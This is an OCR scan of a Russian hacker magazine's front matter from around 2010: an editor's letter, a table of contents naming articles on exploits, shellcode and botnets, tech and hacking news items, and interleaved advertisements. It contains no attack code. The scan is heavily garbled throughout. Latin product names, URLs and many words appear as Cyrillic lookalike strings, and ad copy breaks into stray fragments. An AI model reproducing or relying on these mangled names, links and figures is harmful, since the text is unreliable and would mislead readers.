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Загружено: 100 % вкуса, 100 % пользы 

Открыть еще один глазированный сырок "Зебра" 
после завершения загрузки 



в 



Я сьгг :) 




у срі± :) 



Взломай голод, пока он не взломал тебя! 

Ты ещё думаешь, как? 

Просто - с помощью глазированного сырка «Зебра»! 



Ищи на прилавках города! 










Ты, конечно же, заметил в прошлом номере новую 
рубрику МАЬѴѴАКЕ . посвященную малвари и (анти) 
вирусным технологиям. Рад сообщить, что бета- 
тестудался итеперьнашжурнал пополнился новой 
ежемесячной рубрикой, в которой мы будем тестировать 
и всячески нагибатьантивирусы, реверсить интересные 
трои и вообще писать обо всем, что связано с вирусами- 
антивирусами. Обойдемся без политкорректности: в этих 
делах важна прямота, честность и нестандартный подход, 



Вот этом номере мы по-новому взглянули на 
тестирование антивирусов и устроили краш-тест 
популярных а ви ров отечественного производства. 
Результат отличный: тест завал ил и все, а для 
антивируса на букву «К» мы даже нашли эксклюзивный 
способ выноса, который придется тебе по вкусу. 



ѴѴеІсоппе 1:о МАІѴѴАРЕ! 



пікіІ022р гл. ред.Х 




МедаНеѵѵ$ 

004 Все новое за последний месяц 

РЕШМ. 

016 Кодинг попкорна 

Учимся создавать плагины для медиаплееров РорсогпТѴ 

018 Тест непопов 

Обзор свежихжелезок на ІпІеІАіопп 

РС_20МЕ . 

026 Мас08Х+Ѵіі1иаІВох= любовь 

Запускаем макось под виртуальной машиной 

029 Колонка редактора 

Місгозоібзіаіі, или почемутакдолго грузится винда? 

030 Серверный ^аѵа8с^ір^ 

Знакомимся с МосІе.]з, или как навсегда отказаться 
отРНР, Регіи РуіЬоп 

034 Вардрайвинг в нашем веке 

Пентестбеспроводныхсетей: что нового? 

взлом. 

038 Еазу-Наск 

Хакерские секреты простых вещей 

042 Обзор эксплоитов 

Разбираем свежиеуязвимости 

047 Воздушный дуршлаг 

История взлома крупного беспроводного провайдера 

050 Небезопасность НАТО 

Как НАТО борется с хакерами 

056 Морфии, не отходя от кассы 

Мутация кода во время компиляции 

062 Курить вредно! 

Взлом голландского онлайн-смартшопа 

066 Идем на пасхальную охоту 

Подробности едд Ьипі: шеллкода 

072 Х-Тооіз 

Программы для взлома 

МАШАКЕ . 

074 ѴігизТоІаІ своими руками 

Создаем публичный сервис для проверки 
файла несколькими антивирусами 

078 Краш-тест отечественных антивирусов 

Суровая проверка грандов АѴ-индустрии: победивших нет! 



СЦЕНА. 

082 Миграции ІТ-шников средней полосы 

Гдеи какживутнашиза границей 

юниксойд 

088 Гонка вооружений 

Сравниваем популярные расширения безопасности для ОС Ыпих 

094 Пингвин с реактивным ранцем 

Ускоряем запускприложений в Ыпих 

098 Чудеса трассировки 

Решение проблем с приложениями при помощи утилиты зігасе 

кодинг. 

104 Искусство зомбирования 

Азбука создания неугоняемых ботнетов 

1 08 Симуляция покерного оргазма 

Вкуриваем в кодинг покерных ботов: создаем 
симулятор тренировки 

1 1 2 Потаенные сады ѴѴіпбоѵѵз 

Исследуем недра операционной системы 
с помощью дебаггера и нетолько 

1 1 5 Кодерские типсы и триксы 

Три правила кодинга на С++для настоящих спецов 

8ѴМ/АСК . 

1 1 8 Вход в социалки - на амбарный замок! 

Еще несколько способов контроля трафика 
и управления доступом 

122 Сквозь защитные порядки 

Пробрасываем порты в окнах, никсахи кисках 

127 Не спасовать перед лавиной 

Подготавливаем веб-сервер квысоким нагрузкам 

1 32 Виртуальная сфера 

Управляем облаками с помощью ѴМѵѵагеѵЗрЬеге 

юниты 

1 36 Р8УСН0: Атака словом 

Черная риторика в процессе убеждения 

140 ГАОВМІТЕВ 

Большой РАО 

1 43 Диско 

8.5 Гб всякой всячины 

144 ѴѴШ2 

Удобные ѵѵеЬ-сервисы 
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Небезопасность НАТО 
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056 

Морфим, не отходя от кассы 

Мутация кода во время компиляции 



МасОЗ X + ѴііІиаІВох = любовь 

Запускаем макось под виртуальной машиной 



Как НАТО борется с хакерами 



Создаем публичный сервисдля проверки 
файла несколькими антивирусами 
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Мария «Міррііі» Нефедова МАКіА.МЕРЕОоѵдгаоіс.ри 




МЕ6АМЕѴѴЗ 

ОБО ВСЕМ ЗА ПОСЛЕДНИЙ МЕСЯЦ 



УГАДАЙ ЧТО: ОРЕМ 800КСЕ, НО НЕ СОФТ 



Многие ДО СИХ пор не могут понять, 
почему, распространяя софт бесплатно 
и с исходниками, разработчики (правда, 
очень немногие) умудряются неплохо 
зарабатывать. Так воттебе новый тренд 
— Ореп Зоигсе Нагбѵѵаге (05НѴѴ). Да-да, 
если верить статистике, то разработчики 
свободного железа зарабатывают мил- 
лионы, а некоторые — и десятки мил- 
лионов долларов в год. Бизнес-модель 
по разработке открытого аппаратного 
обеспечения состоит в том, чтобы создать 
дизайн некоего устройства и выложить 
в открытый доступ файлы с чертежами и 
схемами, которые каждый может бесплат- 
но использовать и модифицировать. Так 
на чем же они зарабатывают? В первую 
очередь, на комплектах «Сделай сам». 
Например, парни из компании Ыриісіѵѵаге 
( ѵѵѵѵѵѵ.іідиісіѵѵаге.сопп ) предлагают Веадіе 
ЕтЬесІсІесІ Зіагіег Кіі — набор для созда- 
ния планшета из серии «сделай сам». 

В набор ВХОДЯТ: ОІЕВ-дисплей 



ВеадІеТоисб с диагональю 4.3» (тачскрин, 
разрешение 480 х 272), Еі-іоп аккумулятор 
ВеадІеЗиісе 2600 тАб, которого хватит 
на 3-6 часов, 50-карта на 4 Гб, на борту 
которой уже установлен Апдзігот Еіпих и 
материнская плата ВеадІеВоагб. В итоге 
из всей этой груды железок собирается 
полноценный девайс, который изначаль- 
но открыт для прокачки. Планшет можно 
и нужно кастомизировать: вместо Еіпих’а 
легко устанавливается АпсІгоісІ, а ксамому 
девай су добавляются дополнительные 
модули такие как, например, ВЕІВ-счи- 
тыватель. Устройство для снифинга 
ВЕІВ-метокна базе АпсІгоісІ с классным 
интерфейсом — словом, все зависит 
только оттвоей фантазии. Обойдется 
такой конструктор почти в $400, но это 
явно дешевле, чем, например, разбирать 
новый іРаб :). 



ОБЛАЧНОЕ 

ХРАНИЛИЩЕ ОТ 60061Е 





Едва мы рассказали отом, какоблачные хранилища данных Атагоп 53 можно использо- 
вать нетолько на высоконагруженном сервере, но и просто у себя дома (статья «Атагоп 
53 для обычныхсмертных» из прошлого номера ][), какбоодіеанонсировал свой облач- 
ный сервис — боодіе ЗЬгаде Іог ВеѵеЬрегз ( сосіе.дооаіе.сот/аріз/зіогаде ). Новое храни- 
лище является прямым конкурентом 53 и предоставляет безотказный и быстрый хостинг 
для данных без каких-либо ограничений. Подход простой: «сколько ресурсов потребует- 
ся, столько и используй, за столько и заплати». Каки в случае с 53, данные с большим 
уровнем избыточности, чтобы была возможность восстановить потерянные фрагменты, 
распределяются по различным датацентрам компании. Правда, у Атагопдатацентры 
есть в трех местах планеты, в том числе в Европе, чтоуменьшаетзадержкудля пользова- 
телей из этого региона, а у Ооодіе — пока только в Штатах. С другой стороны, и сам сервис 
пока находится в стадии полузакрытого тестирования. Для того, чтобы опробовать подхо- 
ды боодіе коблачномухранению данных, оценив веб-интерфейс боодіе ЕЬгаде тападег 
и консольную утилиту 051ЛІІ, необходимо заполнитьанкету на сайте и дождаться своего 
инвайта. Зато каждый зарегистрированный разработчикбесплатно получает 100 Гб 
для данных и 300 Гб трафика. Кстати, уже известно, сколько составит оплата за исполь- 
зование хранилища в будущем. Так, гигабайт под данные у «Амазона» стоит, в среднем, 
$0.1 05, а у боодіе намного больше — $0.17. Когда счет идет на терабайты, даже несколько 
центов — это очень большая скидка. 
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Ноутбуки серии А81І8 II ВатЬоо СоІІесІіоп 

на базе процессора Іпіеі® Соге™ і5 



Естественный выбор 



Все в мире стремится к равновесию. Идеально сбалансированное сочетание 
бесподобного дизайна и самых современных технологий вы найдете в ноутбуках 
серии А81І8 У ВатЬоо СоІІесІіоп, оснащенных процессором Іпіеі® Соге™ І5 и под- 
линной операционной системой ѴѴіпсІоѵѵз® 7 Домашняя расширенная. Восхити- 
тельно тонкие и легкие, они поразят вас отделкой из натурального бамбука. 
Неповторимый рисунок покрытия делает каждую модель серии А8У8 У ВатЬоо 
СоІІесІіоп уникальной, подчеркивая индивидуальность владельца и добавляя 
новые штрихи к традиционному образу ноутбука. 

ѵѵѵѵѵѵ.азиз.ш Всемирная гарантия 2 года Горячая линия А81І8: (495) 23-11-999 
Информацию о том, где купить ноутбуки А8У8 можно найти на сайте ѵѵѵѵѵѵ.азизпЬ.ги 

Іпіеі, логотип Іпіеі, ІпіеІ Іпзісіе, Іпіеі Соге и Соге Іпзісіе являются товарными знаками корпорации Іпіеі на территории США и других стран. 

Товар сертифицирован, на правах рекламы. 



Быстрее. 

Умнее. 

у ) 



ѴѴіпсІоѵѵз®. Жизнь без преград. 
А8У8 рекомендует ОС ѴѴіпсІоѵѵз 7. 



Іпзрігіпд Іппоѵаііоп • Регзізіепі Рег^есііоп 



МЕ6АЫЕѴѴ5 



СВОБОДУ МАККИННОНУ! 




Возможно, тебе покажется знакомым имя Гарри МакКиннона, и это совсем неуди- 
вительно, ведь в начале нулевых этот британский гик наделал немало шума, хакнув 
серверы Пентагона и НАСА. Тогда он сумел влезть в 97 государственных машин, что, 
какутверждаютамериканцы, привело кповреждениям компьютеров, отключениям от 
сети иущербу в размере $800 тыс. АГарри всего-навсего искал информацию об НЛО 
и совершенно несобирался ничего портить. Кслову говоря, онтакничего и не нашел 
и сам уверен, что не причинил ни какого ущерба. Тем не менее, Ма Кин нона еще в 
2002 году нашли и арестовали, впоследствии отпустив на свободу сусловием запрета 
на пользование ПК и ежедневных визитов в полицейский участок. С тех пор Гарри, 
страдающий отсиндромаАспергера, депрессии, неврозов и приступов паники, стал 
совсем плох, но США, начиная с 2005 года, все настойчивее требуютего экстрадиции. 
В Америке хакеру грозит до УОлеттюрьмы и огромный штраф. Мать МакКиннона и 
уфологи-активисты все это время отстаивали Гарри, как могли, но без особого успеха. 
На данный моментшансотменитьэкстрадициюостался всего один — по медицинс- 
ким показаниям. Психиатр МакКиннона утверждает, что его пациента никак нельзя 
перевозить в США, ведь Гарри еще никогда вжизни не покидал пределов родного 
города. 



37000 человек удалили аккаунты в РасеЬоок в знак протеста против того, что 
социальная сеть не бережет приватность их данных 



ІРНОМЕ 4^ ИЛИ <ОУ8Т АѴОШ Н010ІМ6 ІТ ІМ ТНАТ ѴѴАУ» 



Стиву Джобсу понадобилось 1 12 минут на конфе- 
ренции разработчиков ѴѴѴѴПС 2010, чтобы рас- 
сказать отом, что насждет; мы же постараемся 
уложиться в одну новость. Внешний вид девайса 
ни для кого не стал сюрпризом. Когда прототип 
устройства попал в руки журналиста Сігтосіо, 
мало кто верил, что уродливый кирпич — это но- 
вый іРЬопе. Комментарии а-ля «Да сразу видно, 
что китайская подделка» стихли после того, как 
Арріе прислала запросстребованием вернуть 
девайс, а после релиза на ѴѴѴѴВС разом пре- 
вратились в радостные восклицания по поводу 
чумового дизайна нового смартфона. Тут, какни 
крути, Арріе — короли маркетинга. Квадратность 
в дизайне появилась из-за того, что с обеих сто- 
рон телефона теперь алюмосиликатное стекло. 
Данные с конференции: оно в 30 раз прочнее и 
в 20 раз жестче пластика. Раньше этот супер- 
прочный материал применялся в производстве 
вертолетов и сверхскоростных поездов, а теперь 
— в іРЬопе. На сайте Арріе даже естьлюбопыт- 
ный ролик, где стекло подвергается плавному 
воздействию, под которым легко гнется. Сейчас 
же, после начала продаж, в Сети есть немало 
фотокс разбитым стеклом: выдерживая плав- 
ные нагрузки, оно точно также, каки обычное, 
не выдерживает резкой нагрузки! Это первый 
фейл. Толщина іРЬопе составляет теперь 
9,3 мм — это самый тонкий смартфон на сегод- 
няшний день. Интересно, что креплениями для 
всех компонентов іРЬопе являются металли- 
ческие ободки по всей боковой поверхности те- 
лефона. Онижеявляются антеннами ВІиеІооіЬ, 
ѴѴі-Рі, 6Р5, атакже телефонными модулями 



65М и СМТ5. Смелый подход оказался бомбой: 
если телефон взять в левую руку, дотронувшись 
долевого нижнего края смартфона, то сигнал 
постепенно падает и, в конце концов, аппарат 
полностью теряетсвязь! Единственное, что мо- 
жет предложить Арріе, и это слова самого Стива 
Джобса на гневное письмо — просто не держать 
его таким образом (в оригинале: «Зизіаѵоісі 
Ьоісііпд іі іп іЬаІѵѵау»). Или вотеще: купить рези- 
новый «бампер» — кусочек красивого китайс- 
кого говна за $29. Ну, или заклеить скотчем, чего 
не стесняются ярые фанаты :). Считаем дальше 
— это второй фейл. Важное новшество нового 
іРЬопе 4 — это, безусловно, сногсшибательный 
дисплей Веііпа. Инженеры Арріе натомже 
3,5-ДЮЙМОВОМ экранеумудрились разместить 
в 4 раза больше пикселей, чем на предыдущих 
моделях іРЬопе. Их плотность настолько вели- 
ка, что человеческий глаз не может различить 
отдельные 78 микрометровые пиксели на раз- 
решении 960x640. Но вотон, третий фейл — на 
некоторых экземплярах на экране появляются 
желтые пятна! «Так чего же его тогда поку- 
пают?»— да потому что это мегателефон! При 
всех известных плюсах он обзавелся классной 
5-мегапиксельной камерой, которая может 
снимать видео с разрешением 720р (и не будет 
курить в темноте, потому что обзавелась ЕЕВ- 
вспышкой]. Помимо этого появилась фрон- 
тальная камера для видеозвонков. Правда, 
последняя работает через ѴѴі-Еі потехнологии 
Еасеііте, которая пока доступна только поку- 
пателям іРЬопе4,хотя должна скоро появиться 
и в Экуре. Помимо этого добавился гироскоп. 



более емкая батарея, энергосберегающий про- 
цессор А4, и, конечноже, новая операционная 
система — Ю54.0. Главная фича — это набившая 
оскомину многозадачность. Переключение 
между свернутыми приложениями происходит 
практически моментально, нодля поддержки 
мультитаска должны покорпеть еще и сами 
производители программ, выпустившие новые 
релизы сучетом обновленного ЭПКот Арріе. 
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Встречай . _ 

нового 

сотрудника! 



Персональный компьютер ІЛМАРТ 0№се із 
на базе процессора ІПІѲР СОГѲ^"^ ІЗ. 
Ваш новый сотрудник! 



№ юлмярт 



(495) 287-4241 
(8і2) 334-9939 

ѵѵѵѵѵѵ.иітаг^.ги 



1п!е1, Іпіеі Соге, \піе\ Соге Оио являются товарными знаками, либо зарегистрированными товарными знаками, 
права на которые принадлежат корпорации 1п!е1 или ее подразделениям на территории США и других стран. 



Быстрее. 

Умнее. 

^ У 



Корпораций Іпіеі не несет ответственность и не осуществляет проверку добросовестности или достоверности каких-либо утверждений или заявлений 
относительно конкретных компьютерньіх систен. упоминание о которых содержится в данной рекламе. 



Корпорация 1п!е1 02010г. Все права защищены. Іптеі логотип Іпіеі, ІпіеІ Соге и Соге являются товарными знаками на территории США и других стран. Реклама. 
'Другие наименования и тоѳзрньіе знаки являются собственностью своих ззко иных владельцев 







МЕ6АЫЕѴѴ5 



ИЗРАИЛЬ ВЕРБУЕТ ХАКЕРОВ 

Все больше и больше государств на нашем голубом 
шарике приходит к выводу, что создание специальных 
киберподразделений — это продиктованная временем 
необходимость. Вот и Израиль решил уделить особое 
внимание данному вопросу, так как атаки на израиль- 
ские сайты и попытки взлома правительственных 
ресурсов в последнее время участились. В Армии 
обороны Израиля (ЦАХАЛ), в структуре крупнейшего 
подразделения военной разведки 8200, скоро появится 
настоящий «киберспецназ», комплектовать который 
собираются гиками и хакерами. Компьютерных гениев 
уже начали искать в рядах ЦАХАЛа и внимательно 
высматривать среди призывников. Вариант приглаше- 
ния специалистов со стороны, из невоенных структур, 
тоже рассматривается. В задачу нового подразде- 
ления войдет не только защита жизненно важных 
узлов израильского киберпространства, но также 
атаки и захват контроля над стратегически важными 
вражескими объектами в Сети. Нечего сказать, затея 
интересная и вполне в духе времени. Даже как-то 
обидно, что в нашей армии нет подобных спецотрядов. 

Согласись, было бы круто, если бы вместо тупыхтестов 
на профпригодность и заданий типа «копать отсюда и 
до обеда» давали бы в зубы птар, отладчик и тестовое 
заданиедля взлома. 

За последние 3 М6СЯЦЭ было продано около 2000 ГЛуШИЛОК для 
подавления сети Уоіа. Таким образом бизнес-центры борются с дешевым 
интернетом, ставшим доступным для их клиентов 






ОТ ВИНТА! 

Когда Сіер поставил на свой древний 
ѴѴі п б 0ѴѴ5- коммуникатор программу, 
передающую изображения с камеры по 
ѴѴі-Рі, первое, что они с РогЬ’ом сделали 
— смело приклеили скотчем телефон к 
радиоуправляемой машинке и гоняли по 
кухне редакции :). Но все это — баловс- 
тво по сравнению с гиковской игрушкой 
Раггоі: АР.Огопе .Внешне это обычный 
радиоуправляемый вертолет, пускай и 
стального футуристического вида. Глав- 
ное в другом — вместо джойстика для 
управления используется акселерометр 
іРЬопе, а в качестве радиоканала —тех- 
нология ѴѴі-Рі. В зависимости оттого, как 
вертеть в пространстве телефон, будет 
изменяться направление движения 
квадрокоптера. Но даже это еще не все. 
Изображения с двух камер, которыми 
оснащен Раггоі: АР.Вгопе, передаются 
на экран смартфона, превращая девайс 
в настоящий беспилотник. Сучетом 
дальнобойности ѴѴІ-РІ можно улетать 



на игрушке даже в те места, которых 
физически не видишь. Адля того, чтобы 
не сшибать все на своем пути (все-таки 
ориентироваться по изображению нетак 
уж и легко), на вертолете установлены 
ультразвуквые альтиметры, а сам девайс 
приводится в движение электромото- 
рами. Впервые Раггоі: АН. Вгопе был 
представлен зимой на выставке СЕ5, 
однако никакая информация о продаже 
не разглашалась. Ктомуже, не было 
до конца ясно, удастся ли наладить се- 
рийное производство. И воттире новые 
данные. Квадрокоптер всеже поступит 
в продажу, и случится это уже осенью. 
Обойдется такая игрушка всего в $299.99 
против прогнозированных ранее $1000- 
1 500! Увы, на станицах журнал а никак 
не вставить видеоролике презентацией 
этой офигенной игрушки, ноты просто 
обязан посмотреть ролики на сайте 
агб гопе.раггоГсот . чтобы понять наш 
восторг. 
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Собери друзей - 

получи приз! 



Марка ѴѴіпдз присутствует на российском 
рынке с 2006 года и на протяжении 
всего этого времени не устает радовать 
своих поклонников всевозможными 
акциями. Сегодня мы представляем 
тебе новый проект ѴѴіпдз - социальную 
сеть ѵѵѵѵѵѵ.соппесОоп.ги . где ты не только 
сможешь найти новых друзей, но и 
выиграть классные призы в денежном 
эквиваленте! 



Телефон (6.000 рублей) 
Ноутбук (12.000 рублей 
Автомобиль (1.000.000 



Хочешь не вставая из-за компа стать обладателем 
универсальной флеш-карты, телефона (6.000 
рублей), ноутбука (12.000 рублей), или даже 
шикарного новенького автомобиля (1.000.000 
рублей)? Тогда регистрируйся на сайте, приглашай 
туда друзей, получай за это баллы и участвуй в 
соревновании! 



Подробности акции и Правила участия смотрите на 
сайте ѵѵѵѵѵѵ.соппесбоп.ги . Суть контеста предельно 
проста: чтобы получить одну из 5.000 флешек, 
достаточно пригласить на сайт 20 человек и 
заработать не менее 20 баллов. Чтобы принять 
участие в соревновании за получение одного из 
650 телефонов, 65 ноутбуков и, конечно, машины - 
пригласи не менее 50 друзей и заработай не менее 
50 баллов, соответственно. 

За что назначаются загадочные баллы? На сайте 
ѵѵѵѵѵѵ.соппесОоп.ги есть раздел с говоряідим 
названием «Медиатеатр», где твои друзья смогут 
развлечься, слушая музыку, а также просматривая 
кино- и фотоматериалы. Но в «Медиатеатре» можно 
и нужно не только смотреть, но и комментировать, 
ведь как только приглашенный тобой друг 



оставит комментарий к любому видео или аудио- 
произведению, ты заработаешь 1 балл. 

Как видишь, выигрывать призы от ѴѴіпдз не так 
уж СЛОЖНО: первые 5 ноутбуков и 9 телефонов, уже 
нашли своих владельцев и отправились в Тверь, 
Воронеж, Заинек и другие уголки РФ. Социальная 
сеть ѵѵѵѵѵѵ.соппесбоп.ги пока еі_це совсем молода, 
так что сейчас твои шансы выиграть приз и\или 
получить подарок особенно велики. Статистика 
говорит сама за себя: у текуідего лидера акции - 
жительницы из Калининграда, которая уже стала 
счастливой обладательницей ноутбука и флешки, 
а теперь является реальным претендентом на 
автомобиль, всего около ста друзей. Основная 
борьба еі_це впереди, ведь это число оставляет 
некислые шансы, чтобы побороться за супер-приз! 



МИНЗДМВСОЦРАЗВИТИ1 РОССИИ предупреждает: 

^ КУРЕНИЕ ВРЕДИТ ВАШЕМУ ЗДОРОВЬЮ 



РЕКЛАМА 





МЕ6АЫЕѴѴ5 



ГУГЛОФОН или ИГРУШКА? 




Очень необычную новинку презентовала компания 
Моіогоіа: коммуникатор РІірОиІ: ориентирован на 
молодежь и выполнен в непривычном глазу виде и 
забавном форм-факторе — он тупо квадратный. 

Размеры девайса совсем малы: 67 х 67 х 1 7, 
но под верхней частью устройства, под сен- 
сорным дисплеем 2.8" с разрешением 320 
X 240 пикселей скрывается полноценная 
ОѴѴЕРТУ-клавиатура. Раскладывается 
смартфон легко: верхняя часть с дисп- 
леем проворачивается вокруг одного 
из углов. В результате печатать на 
таком смартфоне удобно, а держать 
во время разговора пухлый малень- 
кий предмет — не очень. Попробуй 
зажать РОрОиІ; плечом, итутже 
увидишь, какАпбгоісІ 2.1 падает 
в прямом смысле слова :). Да-да, 
новый девайс выходит на старой 
версии АпбгоісІ’а. Но кто знает, может 
Моіогоіа разродится новой прошивкой 
с АпсІгоісІ 2.2 к моменту продаж? Стандартная 
оболочка системы заменена на МоІоВІиг, которая 
позволяет получить быстрый доступ кТѵѵіиег и люби- 
мым сервисам боодіе. Все это работаеточень быстро; еще бы — 600 
МГц процессор и 51 2 Мб оперативки. Кстати, именно благодаря такой 
производительности парни из Моіогоіа не побоялись сделать того, 
чего никогда не будет в іРЬопе — добавить браузер с включенной по 
умолчанию поддержкой РІазЬ. Хотелось бы верить, что ѴѴеЬкіІ: неупадет 
и не затормозит при первом же корявом РІазЬ-баннере с первого же 



сайта:). В России новый Моіогоіа РбрОиІ; появится примерно в августе 
по цене 12 000 — 14000 рублей. Неплохо для одновременно стильного 
и, ктомуже, шустрого аппарата с А-0Р5, электронным компасом и 
неплохой 3 Мп камерой на борту. 



В новой версии ІОЗ 4 было исправлено 65 уЯЗВИМОСТѲЙ, половина 
из которых - критические 



108 4.0 ВЗЛОМАНА! 

Интересное противостояние происходит между закрытой Арріе, кото- 
рая категорически запрещает любые модификации своих смартфонов, 
и хакеров, которые старательно обходят все новые и новые защиты. 
Так, не успели Арріе выпустить новую мобильную І05 4.0, как подсуети- 
лись ребята из Веѵ-Теат [ Ыод.ірЬопе-сІеѵ.огд ]. Сразу за релизом новой 
прошивки свет увидела их утилита для анлока, позволяющая отвязать 
телефон от конкретного оператора. Теперь люди, обновившие модем 
(так называется телефонный модуль смартфона), смогут использовать 
свои аппараты в обход запрета Арріе. Прошло еще немного времени, и 
парни выпустили новую утилиту — РѵѵпадеТооІ, позволяющую сделать 
ЗаіІЬгеак и предоставить пользователю возможность устанавливать 
любые приложения, в том числе пиратские. Правда, утилита работает с 
некоторыми ограничениями. Справились с 4.0 и разработчики другой 
тулзы — гебзпОѵѵ. А вот разработчик самого универсального и популяр- 
ного инструмента — Срігіі: ( зрігіф.сот ). с помощью которого ломается 
и іРаб, пока в тупике. Арріе пофиксила багу, которая позволяла запус- 
тить изегіапсі-эксплойт. Вместо этого все усилия хакера сейчас сфоку- 
сированы на новом баге, который скоро должен дать успех. 



л ^ о РшзадеТооЕ 




Пожалуйста. аиб«рит« усірайспа, котари вы хотите модифицировать. 
Это мошт быть ■і’ііопе 4Рой ТОІКП 2С. 
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8лм$иыс 




тирм ом томорром* 



Проще не бывает. 

Увидел. Нажал. Распечатал 




Инструкиия 



Как распечатать 
изображение с экрана 
монитора. 



Просто нажмите кнопку 
РгІпІЗсгееп. ф, 








мм 660* 



8СХ-3200* 



СІР-325* 



СІХ-3185* 



Забудьте о сложных инструкциях и интерфейсах. С новой линейкой 
компактных лазерных принтеров и МФУ печать становится еще легче. 
Достаточно нажать одну кнопку РгіпІЗсгееп на устройстве, и изобра- 
жение уже на бумаге. Проще не бывает! 



* ми 660 - монохромный принтер, 5СХ-3200 - монохромное МФУ, СІР-325 - цветной принтер, СІХ-3185 - цветное МФУ. 

Единая служба поддержки: 8-800-555-55-55 (звонок по России бесплатный), ѵѵѵѵѵѵ.затзипд.сот 

* Навстречу будущему. Товар сертифицирован. Реклама. 




МЕ6АЫЕѴѴ5 



УАНОО!- БОЛЬШЕ 
НЕ ПОИСКОВИК 

1 5 лет понадобилось УаЬоо!, чтобы понять, что искать в интернете они 
не умеют. Компания приняла решение оставить поисковый бизнес. 
Слияние, начатоеУаЬоо! и МісгозоІІ еще в прошлом году, добралось 
до своего логического финала — теперь поисковый алгоритм УаЬоо! 
полностью заменил майкрософтовский Віпд. Місгозоб:, по сути, купила 
10-летнюю лицензию на поисковыетехнологии партнера, с целью если 
не перегнать, то хотя бы потеснить боодіе. Віпд действительно весьма 
неплох, но его основная проблема заключается втом, что им практичес- 
ки никто не пользуется. Благодаря же альянсу сУаЬоо! Майкрософтсмо- 
жетвывести свой Віпд на позицию поискового движка номердва в мире 
и, наконец, сумеет получить от него прибыль. Если посмотреть сейчас 
на любые инициативы Місговоі"!: в вебе, то это жесточайший провал в 
плане финансовой отдачи. Сам жеУаЬоо! постепенно превращается в 
обычный медиапортал, хоть и с богатой историей. 




«Яндекс» ежедневно получает около 100 МЛН. ЗЭПрОСОВ, и из них 10% 
написаны с ошибками или опечатками 



РВІѴ8.ШЕСКУРТ 



Интересный поворотпроизошел в истории 
одного бразильского банкира по имени Даниель 
Дантас, которого заподозрили в мошенни- 
честве с финансами и арестовали в 2008 году 
в Рио-де-Жанейро. Следствие бы, возможно, 
шло по стандартному сценарию, если бы все 
изъятые из его квартиры харды не оказались 
зашифрованы 256-битным АЕ5. Ключей нет, 
сам Дантас молчит, а использовать паяльник 
нельзя. Делать нечего, винты пришлось отпра- 
вить в Национальный институт криминологии 
(ІМС], где они и застряли на пять месяцев. Что 



уже нимитам делали — непонятно, возможно, 
просто поднимали настроение, перекладывая 
из одной стопки в другую, но в отчете указали: 
«Брутфорс по словарю. 5 месяцев. Безрезуль- 
татно». Единственным весомым результатом 
стала договоренность с ФБР, которые пообе- 
щали попробоватьсвои силы в расшифровке 
данных. Воттут-то и случился казус — федералы, 
на которых ІМС возлагали большие надежды, 
ковыряли несчастные диски больше года и, в 
результате, также ничего не добились. Вернув 
харды в Бразилию, специалисты из ФБР лишь 



развели руками. Согласно отчету федералов, 
данные на дискахзашифрованы двумя софти- 
нами, название одной из которых неизвестно, 
зато второй оказалась бесплатная Тгиесгурі, 
которая наверняка тебе известна. Из того же от- 
чета ясно, что тем самым «передовым методом» 
ФБР оказался... опятьже, брутфорс. Ну, а где же 
закладки в программе, мастер-пароли для от- 
крытия любого шифра, статистические методы 
для дешифрования да иных и т.д. ит.п.?Да может 
они и есть, и паяльникникто не отменял, ата- 
кими новостями лишьусыпляется бдительность. 



ММО- ДЕТЯМ НЕ ИГРУШКА 



В Поднебесной уже давно нетолько следятза глобальным файерволом, но 
еще и кососмотрятна онлайновые игры. В разнообразные ММО-забавы 




режется огромный процент населения. Это уже само по себе непорядок: 
когда жим найти время, чтобы лепить телефоны и материнские пла- 
ты? Производители же уходят на Тайвань, надо что-то срочно делать :]. 
Аналитики предрекают, что к2012 году Китай захватит больше 50% рынка 
ММО-игр, и его доходы составят41 млрд, юаней (это около $6 млрд.). Но 
с 1 -го августа текущего года китайские геймеры, не достигшие 18лет, 
окажутся в очень неприятной ситуации. Власти решили, что несовершен- 
нолетним игрокам нельзя использовать ники — только настоящие имена и 
другие личные данные. Инфа на каждого игрока будет проверяться. Любая 
онлайновая игратеперьдолжна быть оборудована системой анти-зависи- 
мости. То есть, через три часа после начала игры геймер лишится половины 
заработанного в игре за это время, а если не прекратит играть, то через 
пятьчасов лишится вообще всего заработанного. Владельцам онлайн-игр, 
в свою очередь, нужно подтвердить свою благонадежность и обладать 
капиталом не менее$1.4млн (10 миллионов юаней). Главной целью новых 
правил в КНР называют«защиту молодежи» и борьбу с растущим числом 
интернет-зависимых людей в стране. По последним данным, к их числу 
относятся около 1 4% от256 миллионов китайских геймеров, то есть более 33 
миллионов человек. 
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СПЕЦСЛУЖБЫ США НЕГОДУЮТ 



Как мы уже писали, компания АОІ в апреле теку- 
щего года приняла решение продать мессенджер 
ІСОфондуОідіІаІЗкуТесЬпоЬдіезза $187.5 млн. 
□5Т — это российская инвестиционная группа, 
которой, в частности, принадлежит контрольный 
пакетакций Маіі.ги. Сделка выглядитвполнело- 
гичной: «аська» в России очень популярна, плюс 
усервиса множество пользователей в Германии, 



Израиле, Чехии и ряде других стран Восточной 
Европы. Однако РіпапсіаІТітез пишет, что 
представители американских спецслужб крайне 
недовольны та КИМ раскладом. Какпояснили кор- 
респондентам РТ сами представители спецслужб, 
ІСО — один из главных каналов общения для 
многих преступных групп из Восточной Европы. 
Таким образом, переезд серверов ІСО из США 



в Россию затруднит для американцев контроль 
над перепиской преступников. Стоп, какой еще 
контроль? Стало быть, не зря говорят, что без 
шифрования в аське никуда? В действительности 
для чтения логов ребятам не нужны сами серверы 
1С0,таккакэтотвопрос можно решить науровне 
интернет-провайдеров. Атеперь серверы, скорее 
всего, переедут! 



В штате компании боодіе трудится 20621 человек, из них более 99% младше 
40 лет. 



САМЫЙ БОЛЬШОЙ БОТНЕТ ОТ 60061Е :) 



Бурные обсуждения вызвали действия корпорации боодіе, которая 
сначала официально подтвердила наличие в ОС АпсІгоісІ возможнос- 
ти дистанционного удаления приложений, а потом не преминула ею 
воспользоваться. Жертвой стали два сомнительных приложения, 
созданных специалистом по безопасности в ходе интересного экспери- 
мента. Ресерчер хотел показать, насколько легко можно распространить 
зловредное приложение, причем с помощью самих пользователей. Для 
этого в АпсІгоісІ Магкеі: было добавлено два совершенно бесполезных 
приложения, для которых, однако, было написано привлекательное 
описание. И что ты думаешь? Пользователи активно стали устанав- 
ливать их. Правда, обломавшись после установки, многие из юзеров 
«пустышки» удал ил и. Ребята из Ооодіе попросили ресерчера самого 
удалить приложения из репозитория, а сами, вероятно, долго ожидая 
подобного случая, наконец получили возможность управлять миром. 

